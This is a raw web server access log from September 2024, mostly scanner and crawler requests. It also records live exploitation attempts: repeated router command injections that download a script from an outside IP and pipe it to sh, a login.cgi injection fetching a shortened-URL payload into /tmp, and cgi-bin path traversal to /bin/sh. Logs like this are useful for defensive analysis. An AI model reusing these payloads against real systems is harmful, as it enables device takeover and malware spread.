154.216.20.249 - - [02/Sep/2024:00:39:07 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.191.126.213 - - [02/Sep/2024:00:41:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.151.174.125 - - [02/Sep/2024:00:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.16.39.118 - - [02/Sep/2024:00:43:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Sep/2024:00:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [02/Sep/2024:00:45:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Sep/2024:00:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:00:46:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:00:49:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:00:51:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:00:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:00:52:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:00:53:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
170.64.166.144 - - [02/Sep/2024:00:53:21 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
94.156.68.162 - - [02/Sep/2024:00:53:21 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
170.64.166.144 - - [02/Sep/2024:00:53:25 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
170.64.166.144 - - [02/Sep/2024:00:53:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
94.156.68.162 - - [02/Sep/2024:00:54:03 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3"
89.190.156.137 - - [02/Sep/2024:00:54:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
94.156.68.162 - - [02/Sep/2024:00:55:00 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
94.156.68.162 - - [02/Sep/2024:00:55:00 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 9; H3223) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
94.156.68.162 - - [02/Sep/2024:00:55:08 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3"
94.156.68.162 - - [02/Sep/2024:00:55:32 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
94.156.68.162 - - [02/Sep/2024:00:55:32 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 9; SM-G960W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
94.156.68.162 - - [02/Sep/2024:00:55:34 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36"
94.156.68.162 - - [02/Sep/2024:00:55:34 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6 Pro Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"
94.156.68.162 - - [02/Sep/2024:00:55:37 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:00:55:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.102 - - [02/Sep/2024:00:56:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.16.39.118 - - [02/Sep/2024:00:59:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.142.236.43 - - [02/Sep/2024:01:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [02/Sep/2024:01:00:58 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [02/Sep/2024:01:00:59 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [02/Sep/2024:01:01:00 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.43 - - [02/Sep/2024:01:01:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
185.16.39.118 - - [02/Sep/2024:01:02:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.128.95.222 - - [02/Sep/2024:01:04:59 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
178.128.95.222 - - [02/Sep/2024:01:05:00 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
178.128.95.222 - - [02/Sep/2024:01:05:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
89.190.156.137 - - [02/Sep/2024:01:06:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:01:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.133.202.15 - - [02/Sep/2024:01:08:28 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
149.50.103.48 - - [02/Sep/2024:01:08:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [02/Sep/2024:01:09:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:01:09:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.16.39.118 - - [02/Sep/2024:01:10:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.211.254 - - [02/Sep/2024:01:13:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.240.205.34 - - [02/Sep/2024:01:13:17 +0200] "Gh0st\xad" 501 321 "-" "-"
185.16.39.118 - - [02/Sep/2024:01:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.59 - - [02/Sep/2024:01:14:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
64.227.41.39 - - [02/Sep/2024:01:15:20 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
64.227.41.39 - - [02/Sep/2024:01:15:23 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
64.227.41.39 - - [02/Sep/2024:01:15:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
89.190.156.137 - - [02/Sep/2024:01:16:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
147.185.132.21 - - [02/Sep/2024:01:16:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.224.128.59 - - [02/Sep/2024:01:16:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
38.159.232.157 - - [02/Sep/2024:01:16:29 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
185.16.39.118 - - [02/Sep/2024:01:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [02/Sep/2024:01:17:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
89.190.156.137 - - [02/Sep/2024:01:19:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.59 - - [02/Sep/2024:01:21:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [02/Sep/2024:01:21:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.59 - - [02/Sep/2024:01:23:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:01:24:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
79.32.227.60 - - [02/Sep/2024:01:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.224.128.59 - - [02/Sep/2024:01:25:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [02/Sep/2024:01:26:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [02/Sep/2024:01:28:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [02/Sep/2024:01:29:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [02/Sep/2024:01:30:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.70 - - [02/Sep/2024:01:31:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
150.246.180.145 - - [02/Sep/2024:01:38:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20https://tinyurl.com/2rh4n7cf%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.224.128.59 - - [02/Sep/2024:01:38:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:01:39:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:01:40:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:01:40:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:01:42:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.185.132.189 - - [02/Sep/2024:01:44:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.189 - - [02/Sep/2024:01:44:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.244.23 - - [02/Sep/2024:01:50:01 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
141.98.11.173 - - [02/Sep/2024:01:53:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.173 - - [02/Sep/2024:01:55:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [02/Sep/2024:01:55:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
147.185.132.58 - - [02/Sep/2024:01:56:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.126.213 - - [02/Sep/2024:01:58:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:02:03:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.17 - - [02/Sep/2024:02:03:34 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Sep/2024:02:03:35 +0200] "" 501 315 "-" "-"
185.224.128.59 - - [02/Sep/2024:02:04:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:02:04:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:02:05:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:02:05:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
95.214.55.138 - - [02/Sep/2024:02:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [02/Sep/2024:02:06:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.59 - - [02/Sep/2024:02:06:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [02/Sep/2024:02:08:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.17 - - [02/Sep/2024:02:08:15 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
23.225.71.99 - - [02/Sep/2024:02:08:33 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.224.128.17 - - [02/Sep/2024:02:15:16 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Sep/2024:02:15:17 +0200] "" 501 315 "-" "-"
175.107.2.2 - - [02/Sep/2024:02:15:12 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
185.142.236.41 - - [02/Sep/2024:02:16:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [02/Sep/2024:02:16:07 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [02/Sep/2024:02:16:07 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.41 - - [02/Sep/2024:02:16:07 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [02/Sep/2024:02:16:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:02:16:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:02:17:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.52.167 - - [02/Sep/2024:02:18:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:02:18:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:02:21:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
95.214.55.138 - - [02/Sep/2024:02:22:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.218 - - [02/Sep/2024:02:23:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.218 - - [02/Sep/2024:02:23:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [02/Sep/2024:02:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.138 - - [02/Sep/2024:02:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Sep/2024:02:24:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [02/Sep/2024:02:26:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:02:27:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:02:29:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
64.62.197.203 - - [02/Sep/2024:02:30:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
64.62.197.20 - - [02/Sep/2024:02:30:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
185.224.128.59 - - [02/Sep/2024:02:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.216.20.215 - - [02/Sep/2024:02:31:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.20.215 - - [02/Sep/2024:02:31:54 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
149.50.103.48 - - [02/Sep/2024:02:33:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:02:34:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:02:36:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.32.170.17 - - [02/Sep/2024:02:37:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
141.98.11.173 - - [02/Sep/2024:02:42:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:02:43:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.210.212 - - [02/Sep/2024:02:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
149.50.103.48 - - [02/Sep/2024:02:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
13.91.165.136 - - [02/Sep/2024:02:44:21 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:45:10 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:45:32 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:45:32 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:45:51 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:46:04 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
95.214.55.138 - - [02/Sep/2024:02:46:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.91.165.136 - - [02/Sep/2024:02:46:55 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:47:02 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:47:06 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
13.91.165.136 - - [02/Sep/2024:02:47:07 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
89.190.156.137 - - [02/Sep/2024:02:47:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [02/Sep/2024:02:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:02:50:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [02/Sep/2024:02:50:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.84 - - [02/Sep/2024:02:50:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [02/Sep/2024:02:51:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
213.32.39.35 - - [02/Sep/2024:02:53:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
89.190.156.137 - - [02/Sep/2024:02:56:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.84 - - [02/Sep/2024:02:56:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.84 - - [02/Sep/2024:02:56:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.84 - - [02/Sep/2024:02:57:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
95.214.55.138 - - [02/Sep/2024:02:57:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [02/Sep/2024:02:58:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
95.214.55.138 - - [02/Sep/2024:02:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
